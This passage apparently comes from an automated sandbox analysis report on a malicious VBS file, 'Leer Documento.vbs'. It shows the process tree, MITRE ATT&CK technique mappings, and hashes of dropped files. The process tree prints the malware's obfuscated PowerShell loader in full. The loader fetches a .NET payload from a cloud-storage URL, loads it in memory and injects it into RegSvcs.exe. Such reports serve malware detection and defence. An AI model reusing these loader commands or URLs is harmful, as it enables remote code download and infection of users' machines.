      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3092

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Leer Documento.vbs"
1⤵
- Checks computer location settings
PID:4184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bk▒Gk▒a▒Br▒HQ▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒HI▒bgBx▒HU▒Z▒▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒G0▒YwBr▒G0▒b▒▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒bQBj▒Gs▒bQBs▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒JwB0▒Hg▒d▒▒u▒G8▒dgBl▒HU▒bgBv▒Gk▒dgBu▒GU▒LwBz▒GQ▒YQBv▒Gw▒bgB3▒G8▒Z▒▒v▒HM▒YQBn▒HI▒YQBj▒HM▒ZQBk▒C8▒YwBk▒HM▒YQBj▒GQ▒LwBn▒HI▒bw▒u▒HQ▒ZQBr▒GM▒dQBi▒HQ▒aQBi▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒cgBu▒HE▒dQBk▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒F8▒XwBh▒HY▒ZwBk▒GY▒cwBk▒GY▒YQBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bk▒Gk▒a▒Br▒HQ▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\Leer Documento.vbs');powershell -command $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$dihkt = '0';$rnqud = 'C:\Users\Admin\Downloads\Leer Documento.vbs';[Byte[]] $mckml = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($mckml).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $rnqud , '_______avgdfsdfa________________-------------', $dihkt, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:4112
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:2280
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3420

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
55ce77aa2553fe5829c67057cd02e5ad

SHA1
7153c85448ed6dcd81791c1516bce43083c1e8b3

SHA256
2899fd334d3dda83e5305761dfc9e87b4b4c41e77230ce38cb339a0fd7a8a2cc

SHA512
7076044bdba32ac38fa2b2e8a92c7d352fa6277f7036017bc60ec6ab97bb5a63b798898b525c08a4e1bc82870fa7420789d43e9104d64d39d6f56af52b09609e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
524B

MD5
6c4ab3d195d3d28b35e581214c693826

SHA1
f30d99b0c39fa3f89ff2bcaaa11a6de3aafcb235

SHA256
9812174fe929ab809ecb3fb1516a0e018bca552a4225e28ab1f61f3173c9bd17

SHA512
ae0a2fb3d0e123c13d9369fce11ba59828b03c444dd2f49b053e6492531a5334476916e47bc23fda210c98da83ead9e784bbf77a6d2027c8d4e84e8a5d99f19f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
19a87ed8db64a2711b3ecd5b84105d5b

SHA1
f7246dea9d8b690805c8970d04ad12e05460a68b

SHA256
b31d1f02151fa38dd1466713a92613bff1c0a88c62f52d703cfd6f8e8fd442af

SHA512
69b2c83e55bb5fce714c1b2cf30fe539306f84e60100cbe858a072f522ccc9c9655093f7e0dc18bab7514f2917e1e8cbf92ea1f817474b1d3e48091d3651cbd0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
34a64a79c20546a605722a0e2fd9d38c

SHA1
5f415fb27b52d5395d792ade27c65364ee250076

SHA256
5592546d49a61d6730d5c6f3fffbcdad1320b45eae397482812ac2d2f6db3f30

SHA512
3488be1948f2fbb1340178dabb0dc53558e9b9ca13adbf667311471795a6d70795288ca62f1dddedc1dcccd8924de3e99820ef1cefe38d5c6e60d98cf4f73935

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
fb756ddc602a9448699abdeca428b2d2

SHA1
23664f08b3a1b153905ca7ec5e1b566fdf1202a1

SHA256
2bd86d71809e525ce2175e11fb281ca86a92121837ec12067533975fc6061a32

SHA512
a5e8f40bd1a96e17a8365a3c3f0c292a3290d79be913f7b609b87c350261590a06ca7eb7caf08d460baec967731b1c0a47bb4f1bf9ca4838128b009a35536662

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
521081ee5e6151fe95bdf6198f90394d

SHA1
0f83ad68cb4b1304c8a705548559029e14f19c76

SHA256
ed4da129f1d0bdeea3e271ae776b85ed4ea47bd1eb32b38bb34b545afcf86a71

SHA512
e962094fec90a70788acb1e5ad37be363cb9d3956e5908564966bdf853b40dd2ce23a9f943e843a5bcab60e8022c268c7038190a226163570ab6dba6f3e18b0f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
084918b10a3036bdc95214bec16d0a13

SHA1
f07007084c93d89c2b513a31e4d195bd70ed9a09

SHA256
11e1ca550d505d0b2879d93ae018a69c32b296d2539a24c680f8b0e39102777b

SHA512
4ff86ce41b18f1eeaef5dce483cd8ede52b0f54b69ddfcf0d813224a7df03ed18a6338a6aa67d2500b876e12f8b5905e68e38eee5739fa65f5b3dc827e64b281

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
9d7bdc186347b72514588cdd82053dbd

SHA1
ad3ed567fa6ca24575ae031b49d93622b21455d2

SHA256
932b9e409b114dc4ed0bc4d65bd213bc443940753185781691520b09d8d22c65

SHA512
d961d3c679fa9bbbef13137ae96f5f3765e7285e85db9a3b5bbb48819c62859722d8d22b1198439b77ef6e074196c3627df733ae823e44a8657dc08d22461f0a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
8330cdcad0e0f89f51ed2aba75d5638c

SHA1
fe14b832ddeb44f21c26fd1a77d5e0c5df7721a4

SHA256
8fd6c6a758c430bb9c3d1bdfeada3a2db6db2627da7bf280a2ccda0c7c961fb2

SHA512
30210099f5886d2087e339c7cc7e3991bbede968218387d8688e7fccea6c1ad5c60c9c362ba63b91935a90f48627c5e74be666ded9f3b717c98d0fbe7eeb19de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fk54rx5c.lwi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Leer Documento.vbs

Filesize
9.0MB

MD5
cc1b8da62d2bd646a1ee5794fb8a9dc7

SHA1
43e83f2067550e189570259f0e61c16d21a4ae74

SHA256
78afcc73a7058910bbcb67d329e3be5ac299129edc7717409c56af86065a9678

SHA512
ce5bffa002acc5fae426b9fc5ce60886c7ba6853fdc75049f6191d5363970c7a22a297217c464ac6d427eb390647abc827c7db869c777c8639d52e818948e866

Download Submit
memory/336-78-0x0000020586D20000-0x0000020586D2A000-memory.dmp

Filesize
40KB

Download
memory/336-77-0x0000020586D10000-0x0000020586D18000-memory.dmp

Filesize
32KB

Download
memory/3568-79-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4572-58-0x00000168A2290000-0x00000168A22B2000-memory.dmp

Filesize
136KB

Download